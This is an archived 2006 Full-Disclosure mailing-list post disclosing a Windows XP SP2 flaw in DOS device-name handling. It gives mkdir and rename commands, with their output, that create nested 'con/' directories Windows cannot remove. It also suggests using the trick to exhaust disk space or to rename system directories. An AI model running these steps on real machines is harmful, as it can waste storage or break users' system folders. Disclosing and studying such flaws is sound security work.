lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Mon May  1 17:24:56 2006
From: kulikk at monstrum.org (Klaudiusz Kulik)
Subject: DOS device name handling

    Hi.

* Overview:
Valunerability exists in windows xp sp2 (others may also be affected),
probably due to an error within the handling special device DOS names.
In March 2000 Microsoft has patched similar problem in windows 98:
http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=4C6FD7E5-A66E-4A08-B782-2A64C77B95B6

* Environment:
I tried this on polish windows xp sp2 with latest patches. Command outputs
are translated into english, so they are not identical as in english version
of xp.

* Description:
Using simple mkdir and rename commands it is possible to make directory
structure which then can not be removed from disk without special, third
party tools.
Because even empty directory ocuppies some amount of disk space, this
valunerability may be used against a user's machine by creating the millions
of prepared, not eraseable directories. Other scenario may be renaming
system or user's directory to invalid name.

* Details:
In a theory, windows does not allow programs to create directory containing
special DOS device names (e.g. CON, LPT1, COM1, PRN). By simply adding
a slash '/' character at the end of directory name, that protection fails.

* Example:
Assume we are on the root of drive C:

Creating...
mkdir "/foo/foo/foo/foo"

Valid directory structure C:\foo\foo\foo\foo created.

... and renaming:
cd \foo\foo\foo
rename "foo" "con/"
cd ..
rename "foo" "con/"
cd ..
rename "foo" "con/"
cd ..
rename "foo" "con/"
C:\

Now directory structure is:
C:\con\con\con\con

Please note that this is one way operation. Renaming from "con/" or
"con" to "foo" does not work. However, if the directory has only one
level (C:\con) and is empty or contains ,,normal'' entries, it is
possible to remove it.


Now, let's try browse:

C:\cd "con"
System nie mo?e odnale?? okre?lonej ?cie?ki.
[System can not find appropriate path.]
C:\cd "con/"
Nazwa katalogu jest nieprawid?owa.
[Invalid directory name.]


Let's try to rename:

C:\rename "con" "foo"
System nie mo?e odnale?? okre?lonej ?cie?ki.
[System can not find appropriate path.]
C:\rename "con/" "foo"
Nie mo?na odnale?? okre?lonego pliku.
[Could not find appropriate file.]


And finally - removing:

C:\>rmdir /S "con/"
con/, Czy na pewno (T/N)? t
[Are You sure (Y/N)?]
con/\con\con\con\con - Nie mo?na odnale?? okre?lonego pliku.
con/\con\con\con - Nie mo?na odnale?? okre?lonego pliku.
con/\con\con - Nie mo?na odnale?? okre?lonego pliku.
con/\con - Nie mo?na odnale?? okre?lonego pliku.
[Could not find appropriate file.]

Directory exists.

C:\erase /S /Q "con"
Nie mo?na odnale?? \\.\con.
[Could not find \\.\con.]

Please note a strange path.

C:\erase /S /Q "con/"

C:\
Directory *still* exists.

Windows Explorer can browse directory, but renaming or removing fails.
It looks like there is no simple way to remove C:\con from a disk.

-- 
K.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ